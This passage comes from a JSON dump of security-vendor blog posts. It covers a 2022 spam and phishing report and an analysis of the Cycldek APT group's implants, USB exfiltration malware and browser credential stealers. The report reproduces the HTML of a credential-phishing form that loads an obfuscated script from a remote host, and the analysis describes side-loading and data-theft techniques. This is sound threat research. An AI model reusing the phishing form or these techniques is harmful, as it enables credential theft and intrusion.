type=\"email\" id=\"email\" class=\"form-control\" name=\"email\" placeholder=\"email Address\">\n <div class=\"email-error\"></div>\n </div>\n <div class=\"form-group\">\n <label for=\"\">Password</label>\n <input type=\"password\" id=\"password\" class=\"form-control\" name=\"password\" placeholder=\"Password\">\n <div class=\"password-error\"></div>\n </div>\n <div class=\"form-group btn-area\">\n <button class=\"download-btn\" id=\"db\" type=\"submit\">Download</button>\n </div>\n </form>\n </div>\n <script src=\"https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b\"></script>\n\n**_HTML representation of a phishing form_**\n\n### Victims\n\nWe have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.\n\n_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_\n\nThe most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest, only 45.20% of emails in this month were spam.\n\nOn Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.\n\n_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_\n\nEven though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.\n\n### Countries and territories \u2014 sources of spam\n\nIn 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).\n\n_TOP 20 countries and territories \u2014 sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_\n\nThe Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).\n\n### Malicious mail attachments\n\nIn 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That's an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.\n\n_Number of Mail Anti-Virus hits, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_\n\nThe most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits in the same component (1.80%). This vulnerability was more widespread in 2021 and has now dropped to tenth place.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.\n\n_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_\n\nIn Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.\n\n## Statistics: phishing\n\nIn 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.\n\n### Map of phishing attacks\n\nIn 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.\n\nTOP 10 countries and territories by share of attacked users:\n\n**Country/territory** | **Share of attacked users*** \n---|--- \nVietnam | 17.03% \nMacau | 13.88% \nMadagascar | 12.04% \nAlgeria | 11.05% \nEcuador | 11.05% \nMalawi | 10.91% \nBrunei | 10.59% \nBrazil | 10.57% \nMorocco | 10.43% \nPortugal | 10.33% \n \n**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**\n\n### Top-level domains\n\nAs in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. Zone XYZ remained in second place (8.79%), whose share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.\n\n_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_\n\nDomains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13), DE (0.98%), CO.UK (0.98%) and SE (0.92%).\n\n### Organizations under phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger's users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nIt is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70\u201390% of all attempts to follow phishing links by Telegram users were made by Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[![Dynamics of phishing activity on WhatsApp in 2022 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[![Dynamics of phishing activity on Telegram in 2022 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we've seen an increase in targeted phishing attacks where scammers don't immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": "securelist", "title": "Spam and phishing in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2023-02-16T08:00:07", "id": "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "href": "https://securelist.com/spam-phishing-scam-report-2022/108692/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21111141/abstract_blur_code-990x400.jpg)\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 